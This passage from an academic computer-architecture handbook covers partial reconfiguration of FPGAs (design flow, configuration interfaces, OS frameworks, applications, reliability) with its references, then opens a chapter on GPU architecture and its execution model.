in a full bitstream for every configuration and partial bitstreams as needed for the
PRRs to implement all configurations. Figure 4 shows an overview of the stages of
designing a PR system. There are a number of academic tools that seek to further
enhance the PR build flow.
Determining how many PRRs to use and which RMs to allocate to each PRR
is non-trivial. Fewer PRRs containing multiple larger RMs mean that each time
any part of an RM needs to be modified, the whole PRR must be reconfigured,
514 S. A. Fahmy and K. B. Iyer
Static logic
RMA.1.v RMA.3.v RMB.1.v RMB.2.v
Static.v +
reconfigurable
modules as
black box
Synthesis
Synthesis
Draw Pblock
Floorplanning
for every PRR
RMA.1.dcp
RMB.1.dcp
opt+place+route
design
config1.dcp
generate bitstream
configPartialB1
config1.bit configPartialA1.bit .bit
Static
+
Partial{A.1 + B.1}
Fig. 4 The partial reconfiguration design flow. Reconfigurable modules are separately synthe-
sized. Static logic is first passed to the design flow with reconfigurable modules as a black box.
A floorplan is created for the PRRs, each of which is populated by the synthesized modules.
Placement and routing are carried out on a valid configuration with PRRs populated with the
corresponding RMs. This process is repeated for all valid configurations. Finally, bitstreams are
generated for valid configurations
RM A
SR
RM A.M1
PRR
RM B RM B.X1
PRR B.X
PRR B.Y
RM B.Y1
Fig. 5 The nested PR flow with two different nested PRR allocations allowing the location and
size of these PRRs to be modified at runtime, thereby enhancing flexibility
abstractshellA
.dcp
PRR A PRR B
abstractshellB
abstractshellA .dcp
.dcp
dcp
p
abstractshellB
.dcp
Abstract Shell B
PRR B
PartB.3
.bit
PartB.2
.bit
Fig. 6 The abstract shell flow enhances the traditional PR design flow by generating abstract shell
checkpoints for each PRR that enable partial bitstreams to be generated without needing the full
bitstream
Once a design has been compiled and all the full and partial bitstreams generated,
the system can use these to switch between hardware configurations. A full
bitstream is first loaded, instantiating the SR and potentially an RM in each PRR.
(It is possible to create a configuration with an empty RM in each PRR for the
initial state.) Partial bitstreams are similar in format to full bitstreams, except
they contain only the configuration data associated with their PRRs and are hence
smaller. To switch configurations, a partial bitstream must be loaded into the
configuration memory. This can be done over any of the suitable configuration
interfaces (Table 1). External JTAG is the slowest, averaging 10s of Mbps, while
SelectMap (for AMD/Xilinx) and Active Serial (for Intel/Altera) allow for 100s of
Mbps depending on the bus width. These interfaces must be controlled by external
hardware, such as a distinct processor or externally connected computer through a
dedicated programming cable.
For PCIe-hosted FPGAs, AMD/Xilinx provides the MCAP interface, while
Intel/Altera provides CvP. These allow a host machine to transfer bitstreams over
the PCIe interface. For MPSoC designs, the embedded processor can manage
configuration of the programmable FPGA fabric over a controller in the SoC portion
of the chip; in the case of AMD/Xilinx, this is called the PCAP.
Table 1 Configuration interfaces and their range of supported bandwidths and resulting approxi-
mate configuration times for averagely sized bitstreams. Times marked * are negatively impacted
by the overhead of individual word writes. Numbers assume interfaces operate in insecure mode,
meaning data is transferred at max bandwidth. Some interfaces support various clock rates
Type AMD/Xilinx Intel/Altera Bandwidth (Gbps) Reconfig. time (ms)
External JTAG JTAG 0.030–0.066 ≈10000*
SelectMap Active Serial (AS)/FPP 0.66–3.2 ≈100*
Internal ICAP PR Controller 2–6.4 ≈10
PCIe MCAP CvP 6.4 ≈100*
Processor PCAP FPGA Manager 3.2–6.4 ≈30*
subsystem
518 S. A. Fahmy and K. B. Iyer
is provided which can be integrated into user bare metal software running on the
processors. However, these deal with passing raw bitstream data to the configuration
controller. Reconfiguration using these APIs is a blocking operation, requiring
custom designs to overcome this, as was done in Vipin and Fahmy (2014b) where
custom interrupts are exploited to allow bitstream DMAs to complete while the
processor is busy with other tasks.
Managing PR within an OS running on the host processor requires additional
integration. The generally supported approach is a fixed shell into which RMs can
be compiled to generate partial bitstreams, which can then be loaded by making calls
to an API that manages the transfer of bitstream data. ARTICO3 (Rodríguez et al.
2018) is a framework for the AMD/Xilinx Zynq and ZynqMP MPSoCs that allows
custom kernels to be integrated into a software managed platform with automation
of access to the memory hierarchy and abstracted PR. Heterogeneous tasks can be
exploited to enhance runtime and energy efficiency.
ReConOS (Agne et al. 2014) is a more flexible fully developed OS abstraction
for managing PR systems. It tries to unify the management of software and
hardware tasks through a unified thread abstraction. Hardware threads are managed
through PR and different threads can communicate with each other through various
mechanisms. However, the OS kernel must be recompiled to support new hardware
threads.
FPGA OS (Vaishnav et al. 2020) decomposes the development of hardware and
software for heterogeneous embedded systems while supporting multi-tenancy and
abstracted loading of partial bitstreams. However, similar to the above frameworks,
this requires all RMs to abide by the uniform shell interface specification. This
abstraction works well for pure compute acceleration, but not for some embedded
systems where the required interfacing of modules can vary.
ZyPR (Bucknall and Fahmy 2023) extends abstractions further by allowing
Linux Device Tree Overlays (DTOs) to be updated dynamically based on the loaded
RMs with these being enumerated during the build process. This allows for RMs
that access different external I/O to be supported. Additionally, ZyPR presents
an abstracted configuration view to the user through its API, with its middleware
translating these configuration changes into the required bitstream loading.
Coyote (Korolija et al. 2020) applies various OS abstractions to management of
FPGAs, including a process model, scheduling, virtual memory, and I/O virtualiza-
tion. It also supports partial reconfiguration of FPGA tasks using similar approaches
to those described in Section “FPGA Configuration”.
Having discussed the mechanisms and design approach for dynamic partially recon-
figurable systems, how this capability can be exploited in a variety of applications
is now discussed in some detail.
520 S. A. Fahmy and K. B. Iyer
One of the key benefits of FPGAs as a computation platform is that their highly
flexible I/O FPGAs can implement a wide range of interfaces that allow them
to be integrated into a variety of deployment scenarios. For generalized compute
acceleration, this has often been as PCIe accelerators much like GPUs. In such
a deployment, a fixed set of FPGA pins is dedicated to implementing the PCIe
interface, along with the use of soft or hard PCI interfacing logic in the FPGA. The
required accelerator is integrated with this interface logic, and the FPGA can be
addressed much like a GPU, as an accelerator for offloading from a host processor.
Frameworks like RIFFA (Jacobsen et al. 2015) enabled accelerator designers to
automate the process of building the PCIe interface logic and integrating it with
their accelerator design, as well as offering software drivers to manage offload.
However, each different accelerator would require a full FPGA design build with
the integrated PCIe interface logic, and a static reconfiguration of the FPGA, and
often, a system reboot, when changing functions.
The DyRACT framework (Vipin and Fahmy 2014a) was the first to use partial
reconfiguration to keep the PCIe interface logic active in between reconfigurations
of the accelerator logic and to load these bitstreams over PCIe. This concept of
an interface shell, containing the required external interfaces to the FPGA and the
hardware required to manage reconfiguration in static logic, and the accelerator
function in dynamic logic, applied using partial reconfiguration, is now widespread.
Microsoft’s Catapult project (Caulfield et al. 2016) refers to the static portion
as the Blue Bitstream and the user’s function as the Green Bitstream. Amazon’s
AWS F1 (Inc. 2024a) refers to the Shell and Custom Logic. This approach is
essential to productive use of FPGAs as accelerators as it means the FPGA’s state
does not adversely affect the host machine, and that the FPGA can be put to
use for diverse application needs as those needs change over time. AMD/Xilinx’s
Xilinx Runtime Library (XRT) (Inc. 2024b) integrates a host-based runtime with
a hardware platform composed of the static Shell and User portions as above. In
some of these frameworks, multiple concurrent accelerators are supported, thereby
enabling multiple applications to share the FPGA resources and interface access,
often referred to as multi-tenancy (Nguyen and Kumar 2020).
In recent years, data center use of FPGAs has increased, and the ability of FPGAs
to directly process network packets has become important. FPGA Smart NICs have
thus become more commonplace. These are FPGA accelerator cards with PCIe
interfaces as above, but with high-speed network interfaces now also serving to
interface with the datacenter network. Frameworks like Corundum (Forencich et al.
2020) and AMD OpenNIC (Inc. 2024) offer analogous solutions to RIFFA that
extend to the network interface. As of now, these functions are usually integrated
in static bitstreams, but the role of reconfiguration to enhance flexibility is expected
to see these frameworks extended to support partial reconfiguration soon. Serving
as a “bump in the wire” NIC, i.e., passing all packets to a host, while potentially
processing a subset of them, requires that any reconfiguration of function does not
15 Dynamic and Partial Reconfiguration of FPGAs 521
Design Compilation
A major challenge with FPGA design is the compilation time from synthesis to
bitstream generation. This can be hours, or even days, long for complex designs.
This is problematic in the development cycle, where even a small change can add
many hours to compilation time.
SPADES (Nguyen et al. 2023) demonstrates the effective use of the hard Network
on Chip (NoC) in AMD Versal devices, leading to significant gains in compilation
522 S. A. Fahmy and K. B. Iyer
Adaptive Systems
FPGAs have found widespread use in embedded systems where they can often
absorb all the required computing capability to implement complex systems that
interact with their environment. This is even more prevalent now with the wide avail-
ability of FPGA SoCs that include processor cores on the same fabric, providing
software programmability alongside tightly coupled hardware acceleration. Many
of these applications in communications, automotive, industrial control, etc. require
some level of adaptability to evolving conditions and PR allows these systems to
modify their accelerated computing functions as needed at runtime. However, as
alluded to in Section “Designing Partially Reconfigurable Systems,” the design
process can become an obstacle to adoption by domain experts.
Cognitive radio systems have been widely implemented on FPGAs using PR.
This application requires a radio system to modify its baseband radio processing
algorithms based on adapting requirements. Baseband processing chains are usually
implemented in hardware to enable high throughput and low latency. Since the
required hardware can be significantly different for different operating modes,
multiplexing the various modes can be costly in terms of area. PR allows such radio
systems to switch between different modes, e.g., sensing and multiple baseband
modes, dynamically at runtime. This allows the radio systems to consume less
area and power while still supporting dynamic operation. An example design in
Sadek et al. (2017) shows a multi-mode 3G, LTE, and WiFi transceiver using PR to
switch modes that reduces power consumption by 66% compared to a multiplexed
design while only requiring less than 1.5 ms to switch modes. A similar approach
combining PR with module parameterization improves reconfiguration time (Pham
et al. 2017).
In vision systems, there can be various forms of data-dependent processing that
require different accelerators. Rather than implement all modes and select between
15 Dynamic and Partial Reconfiguration of FPGAs 523
PS PL
PS
PR Region [0]
AXI Interconnect (Histogram
Computation))
ZyCAP API
PR
R Region
Re [2]
ICAP
(Gamma Correction)
Corr
Fig. 7 A vision application on an AMD/Xilinx Zynq UltraScale+ MPSoc device, showing the PS
running software that adapts the types of vision filters executed in the PL using PR (Bucknall 2022)
524 S. A. Fahmy and K. B. Iyer
loop typical in adaptive systems can be mapped well to FPGA SoCs where context
switches can be applied through PR (Fahmy 2018). PR can also support various
robustness and failure recovery modes in such systems (Paulsson et al. 2006).
Machine Learning
Significant work has been conducted on optimizing deep neural network accelerator
hardware. These optimizations often require mixed or custom numerical precision
support, and FPGAs are ideally suited to such hardware designs. FPGAs have
been used to implement accelerators for models with precision ranging from 32-
bit floating point, through various fixed point representations, down to binary neural
networks, being able to trade off area against a tolerable accuracy loss.
In Hussain et al. (2015), the authors build a multi-classifier system that can switch
between support vector machine (SVM) and K nearest neighbor (KNN) classifiers
dynamically at runtime and demonstrate that this is up to 8× faster than traditional
full bitstream reconfiguration.
In Irmak et al. (2021), the authors demonstrate how PR can be used to
dynamically switch convolutional neural network (CNN) architectures for multiple
applications. They show that having optimized CNNs for different applications and
swapping them using PR is preferable in terms of accuracy to training a hybrid CNN
while still offering low latency.
In Venieris and Bouganis (2017), the authors build a CNN design framework
that allows multiple blocks of a CNN to be allocated to the same hardware
accelerator through weight only reconfiguration while amortizing the more costly
partial reconfiguration for other blocks through using larger batch sizes to achieve
low latency.
CascadeCNN (Kouris et al. 2018) switches between accelerator hardware with
different numerical precision and hence accuracy. If a sample is misclassified,
it is recomputed with a higher precision model which is slower; otherwise, the
faster inference is accepted. Partial reconfiguration is suggested as a way to switch
between these models.
doses. SRAM FPGAs, however, which are more prevalent, can suffer single event
upsets (SEUs) in their configuration memory, a change in a bit’s state. This is highly
problematic since that can modify the configured datapath and even lead to an
incorrectly configured FPGA.
Space is a commonly considered harsh environment. FPGAs are popular in space
applications due to increasing processing requirements and the need for custom
processing architectures (Osterloh et al. 2009). Radiation in space is a result of
cosmic rays or high-energy particles which can strike devices. FPGAs are also
widely used in high-energy physics experiments where they are used to process
detector data to extract important features for further analysis. In such experiments,
the radiation environment is driven by the types of experiments being performed,
which typically involved strong radiation fields and high-energy particles.
There are a variety of approaches for tackling reliability in such environments,
including spatial redundancy, such as triple modular redundancy (TMR). However,
a solution unique to FPGAs is configuration scrubbing. This is where the config-
uration memory is repeatedly rewritten to combat potential SEUs. It is possible to
read the contents of this memory and rewrite it periodically, or else to continuously
write the known good configuration (Stoddard et al. 2016). This approach remains
imperfect since it is periodic and takes time, so it is typically combined with spatial
approaches (Bolchini et al. 2007; Ichinomiya et al. 2010). An automated framework
for isolated partially reconfigurable modules with TMR was presented in Pham
et al. (2018). In Iturbe et al. (2011), the authors present the R3TOS framework that
combines a runtime scheduler with reliability heuristics to allocate hardware tasks
in a way that minimizes the effects of SEUs and ionizing radiation.
FPGAs can also offer enhanced robustness to failures. In Dörr et al. (2019) the
authors demonstrate the use of PR to manage a fallback processor to support fail-
operation in a complex system. In Oszwald et al. (2018), they demonstrate that this
capability can meet safety requirements for automotive applications. In Shreejith
et al. (2013), PR is used to recover from faults while a redundant unit manages data
processing. This is done at the network level to minimize time overhead.
FPGAs can also serve as a fallback mechanism for any arbitrary faults in the
system, potentially saving costs associated with adding redundancy to every sub-
unit. For instance, consider a system with multiple control units that can be spawned
on-the-fly within an FPGA. Instead of implementing Triple Module Redundancy
(TMR), an FPGA as a fallback option to emulate the faulty unit can be employed.
Research Directions
Recent focus on open-source tool flows for FPGAs has highlighted the obstacles
presented by proprietary bitstream formats. Efforts to address this are gaining
some attention. The potential to create bitstream formats that offer more flexibility
such as relocatability and runtime modification can further simplify the design and
management of PR systems.
526 S. A. Fahmy and K. B. Iyer
While the vendor design processes have improved, mapping these to higher-
level system design paradigms useful to embedded and adaptive systems designers
remains a challenge. Most frameworks discussed still require the application user
to know which bitstreams correspond to a particular RM and PRR. An abstracted
model that addresses system designers without hardware experience would increase
the likelihood that they adopt PR in their designs.
The security considerations of partial reconfiguration in the context of multi-
tenancy systems are also under exploration. Considering multiple users sharing a
single FPGA, it is possible for side channels to enable information leakage or other
attacks which must be mitigated (Ahmed et al. 2022).
Conclusions
Partial reconfiguration of FPGAs has been researched for two decades, yet still
remains a niche feature in practical use. While there remain challenges, the
enhanced vendor design flows and the increasing requirement for FPGAs to address
general-purpose compute acceleration in challenging scenarios mean that PR is
gaining increased attention. Present development shell concepts now provided by
vendors use PR in the background, demonstrating its robustness and applicability.
Recent developments like the abstract shell design flow make the idea of evolving
functionality of PR systems after initial deployment feasible. Hierarchical PR
also reduces the previous limitations of a single static determination of PRRs on
the device. Using these developments, system designers can now apply PR in
more contexts. The research community is expected to exploit such developments
to further simplify and streamline PR system design leading to potential wider
adoption.
References
Agne A, Happe M, Keller A, Lübbers E, Plattner B, Platzner M, Plessl C (2014) Reconos: an
operating system approach for reconfigurable computing. IEEE Micro 34(1):60–71
Ahmed MK, Mandebi J, Saha SK, Bobda C (2022) Multi-tenant cloud FPGA: a survey on security.
arXiv preprint arXiv:2209.11158
Anup Agarwal DK, Seshan S (2023) StaRRNIC: Enabling Runtime Reconfigurable FPGA NICs.
http://reports-archive.adm.cs.cmu.edu/anon/2023/CMU-CS-23-100.pdf
Beckhoff C, Koch D, Torresen J (2012) GoAhead: a partial reconfiguration framework. In:
Proceedings of the IEEE international symposium on field-programmable custom computing
machines (FCCM), pp 37–44
Beckhoff C, Koch D, Torreson J (2013) Automatic floorplanning and interface synthesis of island
style reconfigurable systems with GoAhead. In: International conference on architecture of
computing systems, pp 303–316
Beckhoff C, Koch D, Torresen J (2014) Portable module relocation and bitstream compression
for Xilinx FPGAs. In: 2014 24th international conference on field programmable logic and
applications (FPL), pp 1–8
15 Dynamic and Partial Reconfiguration of FPGAs 527
Benz F, Seffrin A, Huss SA (2012) Bil: a tool-chain for bitstream reverse-engineering. In:
International conference on field programmable logic and applications (FPL), pp 735–738
Bolchini C, Miele A, Santambrogio MD (2007) TMR and partial dynamic reconfiguration to
mitigate SEU faults in FPGAs. In: IEEE international symposium on defect and fault-tolerance
in VLSI Systems (DFT), pp 87–95
Boutros A, Betz V (2023) Field-programmable gate array architecture. In: Chattopadhyay A (ed)
Handbook of computer architecture. Springer, Singapore
Bucknall AR, Shreejith S, Fahmy SA (2019) Network enabled partial reconfiguration for dis-
tributed FPGA edge acceleration. In: 2019 international conference on field-programmable
technology (ICFPT), pp 259–262
Bucknall AR, Fahmy SA (2023) ZyPR: end-to-end build tool and runtime manager for partial
reconfiguration of FPGA SoCs at the edge. ACM Trans Reconfigurable Technol Syst (TRETS)
16(3):34–13433
Bucknall AR (2022) Build framework and runtime abstraction for partial reconfiguration on FPGA
SoCs. Phd thesis, University of Warwick
Capalija D, Abdelrahman TS (2013) A high-performance overlay architecture for pipelined execu-
tion of data flow graphs. In: Proceedings of the international conference on field programmable
logic and applications (FPL)
Caulfield AM, Chung ES, Putnam A, Angepat H, Fowers J, Haselman M, Heil S, Humphrey
M, Kaur P, Kim J-Y et al (2016) A cloud-scale acceleration architecture. In: IEEE/ACM
international symposium on microarchitecture (MICRO)
Compton K, Hauck S (2002) Reconfigurable computing: a survey of systems and software. ACM
Comput Surv 34(2):171–210
Dörr T, Sandmann T, Schade F, Bapp FK, Becker J (2019) Leveraging the partial reconfiguration
capability of FPGAs for processor-based fail-operational systems. In: International symposium
on applied reconfigurable computing, pp 96–111
Duncan A, Rahman F, Lukefahr A, Farahmandi F, Tehranipoor M (2019) FPGA bitstream security:
a day in the life. In: IEEE international test conference (ITC), pp 1–10
Fahmy SA (2018) Design abstraction for autonomous adaptive hardware systems on FPGAs. In:
NASA/ESA conference on adaptive hardware and systems (AHS), pp 142–147
Forencich A, Snoeren AC, Porter G, Papen G (2020) Corundum: an open-source 100-GBPS
NIC. In: IEEE international symposium on field-programmable custom computing machines
(FCCM), pp 38–46
Hussain HM, Benkrid K, Seker H (2015) Dynamic partial reconfiguration implementation of
the SVM/KNN multi-classifier on FPGA for bioinformatics application. In: Proceedings of
the annual international conference of the IEEE engineering in medicine and biology society
(EMBC), pp 7667–7670
Ichinomiya Y, Tanoue S, Amagasaki M, Iida M, Kuga M, Sueyoshi T (2010) Improving the
robustness of a softcore processor against SEUs by using TMR and partial reconfiguration. In:
IEEE international symposium on field-programmable custom computing machines (FCCM),
pp 47–54
Inc. A (2024a) AWS-FPGA. https://github.com/aws/aws-fpga
Inc. X (2024b) XRT. https://github.com/Xilinx/XRT
Inc. X (2024) Open-NIC. https://github.com/Xilinx/open-nic
Inc. X (2024) PYNQ. https://github.com/Xilinx/PYNQ
Irmak H, Ziener D, Alachiotis N (2021) Increasing flexibility of FPGA-based CNN accelerators
with dynamic partial reconfiguration. In: Proceedings of the international conference on field-
programmable logic and applications (FPL), pp 306–311
Iturbe X, Benkrid K, Arslan T, Hong C, Erdogan AT, Martinez I (2011) Enabling FPGAs for
future deep space exploration missions: improving fault-tolerance and computation density with
R3TOS. In: NASA/ESA conference on adaptive hardware and systems (AHS), pp 104–112
Intel (2021) Using the Design Security Features in IntelFPGAs. https://www.intel.com/content/
www/us/en/docs/programmable/683269/current/using-the-design-security-features-in-fpgas.
html
528 S. A. Fahmy and K. B. Iyer
Pham KD, Horta E, Koch D (2017) BITMAN: a tool and API for FPGA bitstream manipulations.
In: Design, automation and test in Europe conference and exhibition (DATE), pp 894–897
Proulx A, Chouinard J-Y, Fortier P, Miled A (2023) A survey on FPGA cybersecurity design
strategies. ACM Trans Reconfigurable Technol Syst 16(2):1–33
Rabozzi M, Durelli GC, Miele A, Lillis J, Santambrogio MD (2016) Floorplanning automation for
partial-reconfigurable FPGAs via feasible placements generation. IEEE Trans Very Large Scale
Integr (VLSI) Syst 25(1):151–164
Reviriego P, Ullah A, Pontarelli S (2019) PR-TCAM: efficient TCAM emulation on Xilinx FPGAs
using partial reconfiguration. IEEE Trans Very Large Scale Integr (VLSI) Syst 27(8):1952–1956
Rodríguez A, Valverde J, Portilla J, Otero A, Riesgo T, Torre E (2018) FPGA-based high-
performance embedded systems for adaptive edge computing in cyber-physical systems: the
ARTICo3 framework. Sensors 18(6):1877
Rossi E, Damschen M, Bauer L, Buttazzo G, Henkel J (2018) Preemption of the partial
reconfiguration process to enable real-time computing with FPGAs. ACM Trans Reconfigurable
Technol Syst (TRETS) 11(2):1–24
Sadek A, Mostafa H, Nassar A Ismail Y (2017) Towards the implementation of multi-band multi-
standard software-defined radio using dynamic partial reconfiguration. Int J Commun Syst
30(17):3342
Shreejith S, Vipin K, Fahmy SA, Lukasiewycz M (2013) An approach for redundancy in FlexRay
networks using FPGA partial reconfiguration. In: Design, automation and test in Europe
conference and exhibition (DATE), pp 721–724
Soni RK, Steiner N, French M (2013) Open-source bitstream generation. In: IEEE international
symposium on field-programmable custom computing machines (FCCM), pp 105–112
Steiger C, Walder H, Platzner M (2004) Operating systems for reconfigurable embedded platforms:
Online scheduling of real-time tasks. IEEE Trans Comput 53(11):1393–1407
Stitt G, Coole J (2011) Intermediate fabrics: virtual architectures for near-instant FPGA compila-
tion. IEEE Embed Syst Lett 3(3):81–84
Stoddard A, Gruwell A, Zabriskie P, Wirthlin MJ (2016) A hybrid approach to FPGA configuration
scrubbing. IEEE Trans Nucl Sci 64(1):497–503
Vaishnav A, Pham KD, Koch D (2018) A survey on FPGA virtualization. In: International
conference on field programmable logic and applications (FPL), pp 131–138
Vaishnav A, Pham K, Powell J, Koch D (2020) Fos: a modular FPGA operating system for dynamic
workloads. ACM Trans Reconfigurable Technol Syst 20:1–20:28
Vipin K, Fahmy SA (2012) Architecture-aware reconfiguration-centric floorplanning for partial
reconfiguration. In: Reconfigurable computing: architectures, tools and applications: interna-
tional symposium on applied reconfigurable computing, pp 13–25
Vipin K, Fahmy SA (2012) A high speed open source controller for FPGA partial reconfiguration.
In: International conference on field-programmable technology (FPT), pp 61–66
Vipin K, Fahmy SA (2013) Automated partitioning for partial reconfiguration design of adaptive
systems. In: IEEE international symposium on parallel and distributed processing workshops,
pp 172–181
Vipin K, Fahmy SA (2014) Automated partial reconfiguration design for adaptive systems with
CoPR for Zynq. In: Proceedings of the international symposium on field-programmable custom
computing machines (FCCM), pp 202–205
Vipin K, Fahmy SA (2014a) DyRACT: a partial reconfiguration enabled accelerator and test
platform. In: International conference on field programmable logic and applications (FPL)
Vipin K, Fahmy SA (2014b) ZyCAP: efficient partial reconfiguration management on the Xilinx
Zynq. IEEE Embed Syst Lett 6(3):41–44
Vipin K, Fahmy SA (2018) FPGA dynamic and partial reconfiguration: a survey of architectures,
methods, and applications. ACM Comput Surv (CSUR) 51(4), 72:1–72:39
Venieris SI, Bouganis C-S (2017) Latency-driven design for FPGA-based convolutional neural
networks. In: Proceedings of the international conference on field programmable logic and
applications (FPL)
530 S. A. Fahmy and K. B. Iyer
Vliegen J, Mentens N, Verbauwhede I (2013) A single-chip solution for the secure remote config-
uration of FPGAs using bitstream compression. In: International conference on reconfigurable
computing and FPGAs (ReConFig), pp 1–6
Wirthlin M (2015) High-reliability FPGA-based systems: space, high-energy physics, and beyond.
Proc IEEE 103(3):379–389
Xiao Y, Park D, Butt A, Giesen H, Han Z, Ding R, Magnezi N, Rubin R, DeHon A (2019) Reducing
FPGA compile time with separate compilation for FPGA building blocks. In: 2019 international
conference on field-programmable technology (ICFPT), pp 153–161. https://doi.org/10.1109/
ICFPT47387.2019.00026
Xiao Y, Hota A, Park D, DeHon A (2022) HiPR: high-level partial reconfiguration for fast
incremental FPGA compilation. In: 2022 32nd international conference on field-programmable
logic and applications (FPL), pp 70–78
Xilinx (2023) UltraScale Architecture Configuration User Guide. https://docs.amd.com/v/u/en-
US/ug570-ultrascale-configuration
Xilinx (2023) Abstract Shell for Dynamic Function eXchange. https://docs.xilinx.com/r/en-US/
ug909-vivado-partial-reconfiguration/Abstract-Shell-for-Dynamic-Function-eXchange
Xilinx (2024) Using Encryption and Authentication to Secure an UltraScale/UltraScale+ FPGA
Bitstream Application Note (XAPP1267). https://docs.xilinx.com/r/en-US/xapp1267-encryp-
efuse-program/Using-Encryption-and-Authentication-to-Secure-an-UltraScale/UltraScale-
FPGA-Bitstream-Application-Note
GPU Architecture
16
Hyeran Jeon
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
Graphics Pipeline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 533
GPU for General-Purpose Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 536
Execution Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 536
Programming Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 538
Hardware Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 540
Memories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 545
Recent Research on GPU Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 550
Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 550
Energy Efficiency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 552
Reliability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 555
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 557
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 557
Abstract
H. Jeon ()
University of California Merced, Merced, CA, USA
e-mail: [email protected]
Keywords
Introduction
Graphics processing units (GPUs) are one of the most widely used accelerators
today. As of 2021, 7 out of top 10 world-class super computers are powered by
GPUs (Top500 2021). After gaining popularity in high-performance computing
domain since mid-2000s, GPU has been conquering emerging domains such as
deep learning, security, virtual reality, and so on by proving superior performance
than other general-purpose computing platforms, easier programmability than
specialized accelerators, and higher affordability than server systems. It is now
impossible to understand the performance of virtually most of the computing
systems, from servers to mobile devices, without a knowledge about GPU. This
chapter aims at providing a thorough description of the full stack of GPU computing,
from execution model and programming interfaces to hardware architecture details
that includes organization of compute cores and memory subsystems. The readers
will be able to grasp unique characteristics of GPU computing and the architecture.
However, the limited space was not sufficient to cover all the latest designs of this
quickly evolving architecture. Thus, this chapter focuses more on describing the
fundamental architecture components and their design details that have been main-
tained across all generations of GPU architectures, such as SIMT execution, batched
processing (in warp or wavefront), diverging memory types and their characteristics,
etc. A few recent studies are also introduced that motivated architectural advances.
The authors hope that this chapter can be used for developing a basic understanding
and finding ways to navigate advanced features of GPUs.
The chapter is structured as follows. In section “Graphics Pipeline,” the graphics
pipeline is overviewed by exploring the core functions of graphics processing and
the architecture of the traditional GPU that only supports graphics applications.
This section will provide historical background of the baseline architecture of GPUs
today. The readers can understand the limitations of traditional GPUs and how the
mitigating efforts led to a brand-new architecture that made GPUs become one of
the most important high-performance computing engines.
In section “GPU for General-Purpose Computing,” the full stack of general-
purpose GPU (GPGPU) computing is introduced, from execution model to
16 GPU Architecture 533
Graphics Pipeline
Vertex
Geometry
Pixel
Render OutPut
Framebuffer
Fig. 2 Simplified
architecture of traditional Memory
GPU architecture
V V V V V V V V
Instructions
G G G G G G G G
P P P P P P P P
painted with complicated color variants. Though the required steps of processing
of these two images are identical, it is obvious that each of them needs different
functional intensities. The left-hand side image needs more operations of geometry
functions while the right-hand side image has higher demand on pixel functions. If
these two images are processed on the same GPU that has fixed number of geometry
and pixel cores, the types of cores that the input image has higher intensity will
become the performance bottleneck. As the number of cores per function is not
dynamically reconfigurable, the throughput of this traditional GPUs was highly
dependent on the types of input images.
To resolve the aforementioned performance issue, one solution was to combine
the dedicated functional cores into a uniform core, namely the unified shader core.
The unified shader core can handle basic arithmetic and logic operations similar to
arithmetic logic units (ALU). Therefore, the graphics operations can be executed
by using combinations of instructions. This effectively resolves the performance
issue caused by limited core resources because each graphics function can use all
cores for its computation. This unified shader core also shed lights on GPUs for
general-purpose computing, which is called GPGPU. As unified shader cores can
not only run graphics operations but also handle any arithmetic operations, they can
also be used for running general-purpose applications such as sorting, matrix/vector
operations, etc. As GPUs inherently have massive parallel processing powers with
tens of compute cores to handle abundant pixel processing, a new computing
wave raised to leverage GPUs with unified shader core as a new high-performance
computing platform for fulfilling the performance needs of big data workloads
that were challenging to support with handful of CPU cores. With the releases
of software frameworks that provide C-like programmability for GPUs, GPGPU
became one of the most promising high-performance computing platforms since
mid-2000s. The GPGPU programming model and architectures will be explored
in the following section. As virtually most of the modern GPUs have general-
purpose computing capabilities, GPGPU and GPU will be used interchangeably in
the following sections.
536 H. Jeon
Execution Model
With unified shader cores, GPU is adopted for non-graphics domains especially
for high-performance computing. GPUs have demonstrated superior performance
for data-intensive workloads that need massive data-level parallelism. Unlike CPUs
that are designed for handling complex control flows with high instruction-level
parallelism, GPUs are mainly used for the applications that need to process abundant
data. So-called big data workloads, non-graphics GPU applications have similarities
with graphics applications in the way that large volumes of independent data (pixels
in graphics) need to be processed with the same algorithms (the core functions of
the graphics pipeline). For example, deep learning is proven to be well suited to
GPU computing. In deep learning, tens to hundreds of data in each layer of a neural
network are processed with neurons that run the same algorithm (e.g., convolution
function). Data within a neural network layer are independent and hence neurons do
not need to consider inter-neuron data dependency. As far as dependencies across
layers are enforced, all data in each layer can be computed with identical func-
tions independently. Such GPU’s execution model is similar to single-instruction
multiple-data (SIMD) in Flynn’s taxonomy because multiple independent data are
processed with the same algorithm. Unlike vector processors that implement SIMD
with single instruction fetch for a vector of data, GPUs use multiple threads, each
fetches the same instruction to process one datum. Therefore, GPU computing is
more precisely defined as single-instruction multiple threads (SIMT).
Even with unified shader core with SIMT processing, there was another perfor-
